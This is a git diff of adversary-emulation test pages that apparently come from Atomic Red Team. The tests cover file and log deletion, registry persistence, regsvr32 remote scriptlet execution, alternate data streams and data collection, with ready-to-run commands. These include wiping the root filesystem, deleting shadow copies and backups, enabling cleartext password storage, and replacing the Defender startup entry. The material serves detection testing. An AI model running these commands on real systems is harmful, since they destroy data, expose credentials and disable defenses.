-- [Atomic Test #9 - Delete VSS - wmic](#atomic-test-9---delete-vss---wmic)
+- [Atomic Test #9 - Delete-PrefetchFile](#atomic-test-9---delete-prefetchfile)
-- [Atomic Test #10 - bcdedit](#atomic-test-10---bcdedit)
-
-- [Atomic Test #11 - wbadmin](#atomic-test-11---wbadmin)
-
-- [Atomic Test #12 - Delete Filesystem - Linux](#atomic-test-12---delete-filesystem---linux)
-
-- [Atomic Test #13 - Delete-PrefetchFile](#atomic-test-13---delete-prefetchfile)
-
-- [Atomic Test #14 - Delete TeamViewer Log Files](#atomic-test-14---delete-teamviewer-log-files)
+- [Atomic Test #10 - Delete TeamViewer Log Files](#atomic-test-10---delete-teamviewer-log-files)
@@ -125,203 +117,172 @@ shred -u #{file_to_shred}
## Atomic Test #4 - Delete a single file - Windows cmd
-Delete a single file from the temporary directory using cmd.exe
+Delete a single file from the temporary directory using cmd.exe.
+Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1107|
+
#### Attack Commands: Run with `command_prompt`!
```cmd
-echo "T1107" > %temp%\T1107.txt
-del /f %temp%\T1107.txt >nul 2>&1
+del /f #{file_to_delete}
```
+#### Dependencies: Run with `command_prompt`!
+##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
+##### Check Prereq Commands:
+```cmd
+IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+echo deleteme_T1107 >> #{file_to_delete}
+```
+
+
## Atomic Test #5 - Delete an entire folder - Windows cmd
-Recursively delete the temporary directory and all files contained within it using cmd.exe
+Recursively delete a folder in the temporary directory using cmd.exe.
+Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1107|
+
#### Attack Commands: Run with `command_prompt`!
```cmd
-mkdir %temp%\T1107
-rmdir /s /q %temp%\T1107
+rmdir /s /q #{folder_to_delete}
```
+#### Dependencies: Run with `command_prompt`!
+##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete})
+##### Check Prereq Commands:
+```cmd
+IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+mkdir #{folder_to_delete}
+```
+
+
## Atomic Test #6 - Delete a single file - Windows PowerShell
-Delete a single file from the temporary directory using Powershell
+Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_T1107|
+
#### Attack Commands: Run with `powershell`!
```powershell
-New-Item $env:TEMP\T1107.txt
-Remove-Item -path $env:TEMP\T1107.txt
+Remove-Item -path #{file_to_delete}
```
+#### Dependencies: Run with `powershell`!
+##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_to_delete} | Out-Null
+```
+
+
## Atomic Test #7 - Delete an entire folder - Windows PowerShell
-Recursively delete the temporary directory and all files contained within it using Powershell
+Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_folder_T1107|
+
#### Attack Commands: Run with `powershell`!
```powershell
-New-Item $env:TEMP\T1107 -ItemType Directory
-Remove-Item -path $env:TEMP\T1107 -recurse
+Remove-Item -Path #{folder_to_delete} -Recurse
```
-
-
-
-
-
-## Atomic Test #8 - Delete VSS - vssadmin
-Delete all volume shadow copies with vssadmin.exe
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-vssadmin.exe Delete Shadows /All /Quiet
+#### Dependencies: Run with `powershell`!
+##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
```
-
-
-## Atomic Test #9 - Delete VSS - wmic
-Delete all volume shadow copies with wmic
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-wmic shadowcopy delete
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #10 - bcdedit
-This test leverages `bcdedit` to remove boot-time recovery measures.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-bcdedit /set {default} bootstatuspolicy ignoreallfailures
-bcdedit /set {default} recoveryenabled no
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #11 - wbadmin
-This test deletes Windows Backup catalogs.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-wbadmin delete catalog -quiet
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #12 - Delete Filesystem - Linux
+## Atomic Test #8 - Delete Filesystem - Linux
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Linux
@@ -345,8 +306,9 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
-## Atomic Test #13 - Delete-PrefetchFile
-Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique.
+## Atomic Test #9 - Delete-PrefetchFile
+Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
+before and after the test to verify that the number of prefetch files decreases by 1.
**Supported Platforms:** Windows
@@ -369,34 +331,46 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
-## Atomic Test #14 - Delete TeamViewer Log Files
+## Atomic Test #10 - Delete TeamViewer Log Files
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
-log file format of TeamViewerXX_Logfile.log
+log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
+
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
-**Supported Platforms:** Windows, macOS
+**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\TeamViewer_54.log|
+
#### Attack Commands: Run with `powershell`!
```powershell
-if ($env:os -eq "Windows_NT") {
- New-Item $env:TEMP\TeamViewer_54.log
- Remove-Item $env:TEMP\TeamViewer_54.log
-} else {
- New-Item $env:HOME\TeamViewer_54.log
- Remove-Item $env:HOME\TeamViewer_54.log
-}
+Remove-Item #{teamviewer_log_file}
```
+#### Dependencies: Run with `powershell`!
+##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{teamviewer_log_file} | Out-Null
+```
+
+
diff --git a/Atomic_Threat_Coverage/Triggers/T1112.md b/Atomic_Threat_Coverage/Triggers/T1112.md
index 36fc90e..45c972b 100644
--- a/Atomic_Threat_Coverage/Triggers/T1112.md
+++ b/Atomic_Threat_Coverage/Triggers/T1112.md
@@ -14,21 +14,18 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #2 - Modify Registry of Local Machine - cmd](#atomic-test-2---modify-registry-of-local-machine---cmd)
-- [Atomic Test #3 - Modify Registry of Another User Profile](#atomic-test-3---modify-registry-of-another-user-profile)
+- [Atomic Test #3 - Modify registry to store logon credentials](#atomic-test-3---modify-registry-to-store-logon-credentials)
-- [Atomic Test #4 - Modify registry to store logon credentials](#atomic-test-4---modify-registry-to-store-logon-credentials)
+- [Atomic Test #4 - Add domain to Trusted sites Zone](#atomic-test-4---add-domain-to-trusted-sites-zone)
-- [Atomic Test #5 - Modify registry to store PowerShell code](#atomic-test-5---modify-registry-to-store-powershell-code)
-
-- [Atomic Test #6 - Add domain to Trusted sites Zone](#atomic-test-6---add-domain-to-trusted-sites-zone)
-
-- [Atomic Test #7 - Javascript in registry](#atomic-test-7---javascript-in-registry)
+- [Atomic Test #5 - Javascript in registry](#atomic-test-5---javascript-in-registry)
## Atomic Test #1 - Modify Registry of Current User Profile - cmd
-Modify the registry of the currently logged in user using reg.exe cia cmd console
+Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
+will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
**Supported Platforms:** Windows
@@ -57,19 +54,25 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
## Atomic Test #2 - Modify Registry of Local Machine - cmd
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
-CMD is ran as Administrative rights.
+CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
+will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe|
+
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
-reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
+reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
```
#### Cleanup Commands:
@@ -84,83 +87,10 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
-## Atomic Test #3 - Modify Registry of Another User Profile
-Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-
-```powershell
-# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
-# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
-$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
-
-Write-Verbose -Message 'Gathering Profile List and loading their registry hives'
-# Get Username, SID, and location of ntuser.dat for all users
-
-$ProfileList = @()
-$ProfileList = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' | Where-Object { $_.PSChildName -match $PatternSID } |
- Select @{ name = "SID"; expression = { $_.PSChildName } },
- @{ name = "UserHive"; expression = { "$($_.ProfileImagePath)\ntuser.dat" } },
- @{ name = "Username"; expression = { $_.ProfileImagePath -replace '^(.*[\\\/])', '' } }
-
-# Get all user SIDs found in HKEY_USERS (ntuder.dat files that are loaded)
-$LoadedHives = Get-ChildItem Registry::HKEY_USERS | ? { $_.PSChildname -match $PatternSID } | Select @{ name = "SID"; expression = { $_.PSChildName } }
-
-$SIDObject = @()
-
-foreach ($item in $LoadedHives)
-{
- $props = @{
- SID = $item.SID
- }
-
- $TempSIDObject = New-Object -TypeName PSCustomObject -Property $props
- $SIDObject += $TempSIDObject
-}
-
-# We need to use ($ProfileList | Measure-Object).count instead of just ($ProfileList).count because in PS V2
-# if the count is less than 2 it doesn't work. :)
-for ($p = 0; $p -lt ($ProfileList | Measure-Object).count; $p++)
-{
- for ($l = 0; $l -lt ($SIDObject | Measure-Object).count; $l++)
- {
- if (($ProfileList[$p].SID) -ne ($SIDObject[$l].SID))
- {
- $UnloadedHives += $ProfileList[$p].SID
- Write-Verbose -Message "Loading Registry hives for $($ProfileList[$p].SID)"
- reg load "HKU\$($ProfileList[$p].SID)" "$($ProfileList[$p].UserHive)"
-
- Write-Verbose -Message 'Attempting to modify registry keys for each profile'
- #####################################################################
- reg add "HKEY_CURRENT_USER\$($ProfileList[$p].SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t REG_DWORD /v HideFileExt /d 1 /f
- }
- }
-}
-
-Write-Verbose 'Unloading Registry hives for all users'
-# Unload ntuser.dat
-### Garbage collection and closing of ntuser.dat ###
-[gc]::Collect()
-reg unload "HKU\$($ProfileList[$p].SID)"
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #4 - Modify registry to store logon credentials
-Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
+## Atomic Test #3 - Modify registry to store logon credentials
+Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
+Upon execution, the message "The operation completed successfully." will be displayed.
+Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
**Supported Platforms:** Windows
@@ -187,8 +117,12 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
-## Atomic Test #5 - Modify registry to store PowerShell code
-Sets Windows Registry key containing base64-encoded PowerShell code.
+## Atomic Test #4 - Add domain to Trusted sites Zone
+Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
+Upon execution, details of the new registry entries will be displayed.
+Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
+
+https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
**Supported Platforms:** Windows
@@ -198,49 +132,14 @@ Sets Windows Registry key containing base64-encoded PowerShell code.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
-| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion|
-| registry_entry_storage | Windows Registry entry to store code under key | String | Debug|
+| bad_domain | Domain to add to trusted site zone | String | bad-domain.com|
#### Attack Commands: Run with `powershell`!
```powershell
-$OriginalCommand = '#{powershell_command}'
-$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
-$EncodedCommand =[Convert]::ToBase64String($Bytes)
-$EncodedCommand
-Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore
-```
-
-
-
-
-
-
-
-
-## Atomic Test #6 - Add domain to Trusted sites Zone
-Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
-https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!
-
-
-```powershell
-$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
@@ -250,7 +149,7 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
#### Cleanup Commands:
```powershell
-$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
Remove-item $key -Recurse -ErrorAction Ignore
```
@@ -261,8 +160,9 @@ Remove-item $key -Recurse -ErrorAction Ignore
-## Atomic Test #7 - Javascript in registry
-Upon execution, a javascript block will be placed in the registry for persistence
+## Atomic Test #5 - Javascript in registry
+Upon execution, a javascript block will be placed in the registry for persistence.
+Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1117.md b/Atomic_Threat_Coverage/Triggers/T1117.md
index f45e171..0568b74 100644
--- a/Atomic_Threat_Coverage/Triggers/T1117.md
+++ b/Atomic_Threat_Coverage/Triggers/T1117.md
@@ -20,7 +20,7 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish Pe
## Atomic Test #1 - Regsvr32 local COM scriptlet execution
-Regsvr32.exe is a command-line program used to register and unregister OLE controls
+Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@@ -62,7 +62,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution
-Regsvr32.exe is a command-line program used to register and unregister OLE controls
+Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
+windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@@ -91,7 +92,7 @@ regsvr32.exe /s /u /i:#{url} scrobj.dll
## Atomic Test #3 - Regsvr32 local DLL execution
-Regsvr32.exe is a command-line program used to register and unregister OLE controls
+Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1119.md b/Atomic_Threat_Coverage/Triggers/T1119.md
index b96e40b..0f7ddc1 100644
--- a/Atomic_Threat_Coverage/Triggers/T1119.md
+++ b/Atomic_Threat_Coverage/Triggers/T1119.md
@@ -18,7 +18,8 @@ This technique may incorporate use of other techniques such as [File and Directo
## Atomic Test #1 - Automated Collection Command Prompt
-Automated Collection
+Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
+to see what was collected.
**Supported Platforms:** Windows
@@ -30,10 +31,15 @@ Automated Collection
```cmd
+mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
dir c: /b /s .docx | findstr /e .docx
-for /R c: %f in (*.docx) do copy %f c:\temp\
+for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
```
+#### Cleanup Commands:
+```cmd
+del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
+```
@@ -43,7 +49,8 @@ for /R c: %f in (*.docx) do copy %f c:\temp\
## Atomic Test #2 - Automated Collection PowerShell
-Automated Collection
+Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
+to see what was collected.
**Supported Platforms:** Windows
@@ -55,9 +62,14 @@ Automated Collection
```powershell
-Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
+New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
+Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
```
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:TEMP\T1119_powershell_collection -Force | Out-Null
+```
@@ -67,7 +79,8 @@ Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:
## Atomic Test #3 - Recon information for export with PowerShell
-collect information for exfiltration
+collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
+to see what was collected.
**Supported Platforms:** Windows
@@ -99,7 +112,8 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
## Atomic Test #4 - Recon information for export with Command Prompt
-collect information for exfiltration
+collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
+to see what was collected.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1121.md b/Atomic_Threat_Coverage/Triggers/T1121.md
index 799f5ed..6a39a73 100644
--- a/Atomic_Threat_Coverage/Triggers/T1121.md
+++ b/Atomic_Threat_Coverage/Triggers/T1121.md
@@ -14,7 +14,7 @@ Adversaries can use Regsvcs and Regasm to proxy execution of code through a trus
## Atomic Test #1 - Regasm Uninstall Method Call Test
-Executes the Uninstall Method, No Admin Rights Required
+Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed.
**Supported Platforms:** Windows
@@ -62,7 +62,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvs Uninstall Method Call Test
-Executes the Uninstall Method, No Admin Rights Required, Requires SNK
+Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
+along with other information about the assembly being installed.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1124.md b/Atomic_Threat_Coverage/Triggers/T1124.md
index 2ebf74b..d21eddd 100644
--- a/Atomic_Threat_Coverage/Triggers/T1124.md
+++ b/Atomic_Threat_Coverage/Triggers/T1124.md
@@ -14,7 +14,7 @@ An adversary may gather the system time and/or time zone from a local or remote
## Atomic Test #1 - System Time Discovery
-Identify the system time
+Identify the system time. Upon execution, the local computer system time and timezone will be displayed.
**Supported Platforms:** Windows
@@ -44,7 +44,7 @@ w32tm /tz
## Atomic Test #2 - System Time Discovery - PowerShell
-Identify the system time via PowerShell
+Identify the system time via PowerShell. Upon execution, the system time will be displayed.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1136.md b/Atomic_Threat_Coverage/Triggers/T1136.md
index 8ed767c..6fbd5f7 100644
--- a/Atomic_Threat_Coverage/Triggers/T1136.md
+++ b/Atomic_Threat_Coverage/Triggers/T1136.md
@@ -100,7 +100,8 @@ dscl . -delete /Users/#{username}
## Atomic Test #3 - Create a new user in a command prompt
-Creates a new user in a command prompt
+Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the
+new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_CMD"
**Supported Platforms:** Windows
@@ -134,7 +135,8 @@ net user /del "#{username}"
## Atomic Test #4 - Create a new user in PowerShell
-Creates a new user in PowerShell
+Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the
+new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_PowerShell"
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1138.md b/Atomic_Threat_Coverage/Triggers/T1138.md
index 4fd1c68..5178276 100644
--- a/Atomic_Threat_Coverage/Triggers/T1138.md
+++ b/Atomic_Threat_Coverage/Triggers/T1138.md
@@ -26,11 +26,8 @@ To keep shims secure, Windows designed them to run in user mode so they cannot m
## Atomic Test #1 - Application Shim Installation
-To test injecting DLL into a custom application
-you need to copy AtomicShim.dll Into C:\Tools
-As well as Compile the custom app.
-We believe observing the shim install is a good
-place to start.
+Install a shim database. This technique is used for privelage escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete."
+will be displayed.
**Supported Platforms:** Windows
@@ -48,9 +45,12 @@ place to start.
```cmd
sdbinst.exe #{file_path}
-sdbinst.exe -u #{file_path}
```
+#### Cleanup Commands:
+```cmd
+sdbinst.exe -u #{file_path}
+```
@@ -73,6 +73,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - New shim database files created in the default shim database directory
+Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
+
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
**Supported Platforms:** Windows
@@ -103,6 +105,9 @@ Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAc
## Atomic Test #3 - Registry key creation and/or modification events for SDB
+Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
+the registry keys that were created. These keys can also be viewed using the Registry Editor.
+
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1158.md b/Atomic_Threat_Coverage/Triggers/T1158.md
index 5367ea8..9829931 100644
--- a/Atomic_Threat_Coverage/Triggers/T1158.md
+++ b/Atomic_Threat_Coverage/Triggers/T1158.md
@@ -94,58 +94,92 @@ xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF
## Atomic Test #3 - Create Windows System File with Attrib
-Creates a file and marks it as a system file using the attrib.exe utility.
+Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
+and observe that the Attributes are "SA" for System and Archive.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_modify | File to modify using Attrib command | string | %temp%\T1158.txt|
+
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
-echo T1158 > %TEMP%\T1158.txt
-attrib.exe +s %TEMP%\T1158.txt
+attrib.exe +s #{file_to_modify}
```
#### Cleanup Commands:
```cmd
-del /A:S %TEMP%\T1158.txt >nul 2>&1
+del /A:S #{file_to_modify} >nul 2>&1
```
+#### Dependencies: Run with `command_prompt`!
+##### Description: The file must exist on disk at specified location (#{file_to_modify})
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+echo system_Attrib_T1158 >> #{file_to_modify}
+```
+
+
## Atomic Test #4 - Create Windows Hidden File with Attrib
-Creates a file and marks it as hidden using the attrib.exe utility.
+Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
+and observe that the Attributes are "SH" for System and Hidden.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_modify | File to modify using Attrib command | string | %temp%\T1158.txt|
-#### Attack Commands: Run with `command_prompt`!
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
-echo T1158_hidden > %TEMP%\T1158_hidden.txt
-attrib.exe +h %TEMP%\T1158_hidden.txt
+attrib.exe +h #{file_to_modify}
```
#### Cleanup Commands:
```cmd
-del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
+del /A:H #{file_to_modify} >nul 2>&1
```
+#### Dependencies: Run with `command_prompt`!
+##### Description: The file must exist on disk at specified location (#{file_to_modify})
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+echo system_Attrib_T1158 >> #{file_to_modify}
+```
+
+
@@ -238,7 +272,8 @@ defaults write com.apple.finder AppleShowAllFiles NO
## Atomic Test #8 - Create ADS command prompt
-Create an Alternate Data Stream with the command prompt. Write access is required.
+Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
+folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt"
**Supported Platforms:** Windows
@@ -248,7 +283,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_name | File name of file to create ADS on. | string | test.txt|
+| file_name | File name of file to create ADS on. | string | %temp%\T1158_has_ads_cmd.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
@@ -256,7 +291,6 @@ Create an Alternate Data Stream with the command prompt. Write access is require
```cmd
-echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
```
@@ -268,13 +302,26 @@ del #{file_name} >nul 2>&1
+#### Dependencies: Run with `command_prompt`!
+##### Description: The file must exist on disk at specified location (#{file_name})
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+echo normal_text >> #{file_name} >nul 2>&1
+```
+
+
## Atomic Test #9 - Create ADS PowerShell
-Create an Alternate Data Stream with PowerShell. Write access is required.
+Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
+in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
**Supported Platforms:** Windows
